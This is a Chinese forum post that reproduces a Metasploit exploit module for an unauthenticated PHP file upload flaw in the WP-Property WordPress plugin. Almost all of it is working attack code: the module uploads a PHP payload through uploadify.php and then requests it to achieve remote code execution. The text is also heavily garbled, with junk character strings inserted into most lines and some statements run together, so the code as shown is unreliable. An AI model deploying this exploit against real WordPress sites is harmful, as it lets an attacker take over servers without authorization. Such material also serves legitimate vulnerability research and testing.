WordPress WP-Property PHP 文件上传漏洞
3 f/ D% x |/ @2 M$ T+ m! f- ]" K( x2 k' b: @
## # This file is part of the Metasploit Framework and may be subject to
9 t5 V/ {" ^) U: b6 ?5 L+ [* U8 e
# redistribution and commercial restrictions. Please see the Metasploit
: E* y& i8 ^9 F# [% k, D ~" y& i1 J+ |, l4 i6 }! L3 I
# Framework web site for more information on licensing and terms of use.
; m' a+ {8 T; E. v8 i( f7 z! W" h3 G, s
# http://metasploit.com/framework/ ##+ s3 _7 {8 K, u) S) m
" k/ c. D$ _ J3 T) {# b8 j3 ^
) z+ [2 H% u( N. T3 ?+ e3 v; w$ d& d% g. A" \
- E& S; T) n/ q# ?/ A
! r" @) n" Q: K, X( r: i5 prequire 'msf/core'* R+ q* B Y! E+ ~" J- v
require 'msf/core/exploit/php_exe'7 n2 T- Z* h! W( g& }3 b9 F
9 m$ Y% g& K! N) q) n& H5 K9 ~class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
( Q/ P0 v5 }- B" _* L7 {'Description' => %q{% r. T+ `4 `& I0 Z2 y
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
2 `& d5 V8 m: V+ @- c[
; \/ R. q8 y3 N2 r- h2 u'Sammy FORGIT', # initial discovery6 `" o' b9 B; K3 G, b
'James Fitts <fitts.james[at]gmail.com>' # metasploit module' \7 J+ q& C3 m
], z2 t# R x; b! t6 E
'License' => MSF_LICENSE,
5 r' ^9 h' u. F2 h! i'References' =>
& ^) j h, S' Y& ~. L[! X- X+ m6 b: o( x& J
[ 'OSVDB', '82656' ],
1 [* c) V/ m0 s) \6 {$ \[ 'BID', '53787' ],% W0 l* b: o$ u$ n- I. f! [& ?
[ 'EDB', '18987'],
3 I7 u: M) v/ D; e" Z[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
% c- j+ H( c9 f5 |],
& h |1 S4 d* p K' ~'Payload' => a c- [1 H+ Q3 J0 _
{
# Z7 g. L) [. }* w'BadChars' => "\x00",
6 P1 L. H n) X; Z& U2 L},- {" q& ^- q* ^; K8 C
'Platform' => 'php',
, [: F: f' y5 n) f, \1 G, o'Arch' => ARCH_PHP,6 b1 e* J L+ y+ B
'Targets' =>
8 A& @- c7 B* M# Z3 D' d[! t, S: V3 T; t
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],9 s" z- f/ A) r3 n" l! H
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 g4 p& T9 T8 s2 ~. D/ {( x
],
& d \9 r0 X2 f% h& D+ E. s'DefaultTarget' => 0,4 t. y' t0 u4 m9 v
'DisclosureDate' => 'Mar 26 2012'))
& A. k' g; c8 b3 }# f. E7 M: c: X" S0 O8 s) k. q W9 x3 f# L. D) k2 D
register_options(
( C/ U2 n1 _# T0 H0 l[
8 a+ g" l _/ ~" r; d' n( GOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
+ `5 A5 r+ G( r6 T], self.class)
e% d8 M7 W( c6 Iend
) {$ B4 Q6 r$ ?2 y0 b
* ^) W; C) |/ }, B. A/ P3 udef check( F. k& p. n+ W5 U- Q9 t
uri = target_uri.path
) C' D3 b2 ~, |1 K# A* ^7 uuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',/ ?8 s) z) i' l; m
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"" m* V4 Q6 V8 l0 Q& l! n" C8 |/ h
})
& u( K$ A( z0 F- ~
& R% b3 V9 Q8 N/ Pif not res or res.code != 200. R, _4 @* L! z* |6 A! F
return Exploit::CheckCode::Unknown& Q/ o% m) M% P8 {
end$ M7 X7 K4 d( `5 K f- |
8 J% a. M- X d5 Rreturn Exploit::CheckCode::Appears8 H- k) |9 ~9 ^9 N0 L7 j6 Y, @
end6 Z0 R4 V% x; L/ C3 N: I
' o: x/ y" h/ H6 Y' F
def exploit
* U" Y$ H, R" F; furi = target_uri.path" b0 t- e* {1 j; `' P
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)7 {# a7 Q- C6 o# O: |
% B0 o* z, ~3 a* H) ~2 }' ?- O; m
data = Rex::MIME::Message.new, ^: U8 M: \6 N& L& F% m' o' c
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
7 S- `/ `. |; t: W% b2 Tdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")! _+ `* ]5 e5 q' e: K
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- F1 |: v* V3 ~$ I4 a/ \ ]
6 w) U2 Y x6 o/ V
print_status("#{peer} - Uploading payload #{@payload_name}")$ g7 F3 a) V7 G8 U4 e
res = send_request_cgi({( M* R8 n3 q+ j* R: S3 O s
'method' => 'POST',0 x! a5 d2 H) x1 g; P- p+ D
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",$ s: M, J, }2 f
'ctype' => "multipart/form-data; boundary=#{data.bound}",
/ ~( r0 R) ~1 W0 { j5 c9 O# S" C'data' => post_data
3 {* n x4 c7 R/ f# c2 o0 f})
4 R* U4 R7 s, N9 | X' Q
# h% ]" e& n8 Bif not res or res.code != 200 or res.body !~ /#{@payload_name}/
' l7 f$ Z0 E% T6 jfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")) v. {. j" g* g& H- W
end
' N2 Z# {/ C! b" ]) u( _7 C5 @5 g- j; u7 i( q; ^6 s
upload_uri = res.body
2 D3 ]+ k6 j( m( \/ B% c+ c' i) g; c: G. r4 ]) {
print_status("#{peer} - Executing payload #{@payload_name}") ~% P8 n" x* A- ~* z
res = send_request_raw({0 V+ i5 ~, W/ @/ u/ B* B
'uri' => upload_uri,
7 I# [' M0 v1 i" J'method' => 'GET'/ d9 l8 f" r5 A1 a
})
V+ @9 b7 i& B( S) ]# nend+ `+ ]+ i. r( ]9 e% ?6 t7 E
end0 g# v3 i0 m% \6 o
' V3 o( N; O& r8 z4 S# i9 \+ y不要问我这写的是什么 怎么利用 我是说msf.8 {3 A. e Z& f8 I0 y
' Z9 `4 }6 l, u% |3 ~( u* u
|
发表于 2013-1-4 19:51:30
收藏
支持
反对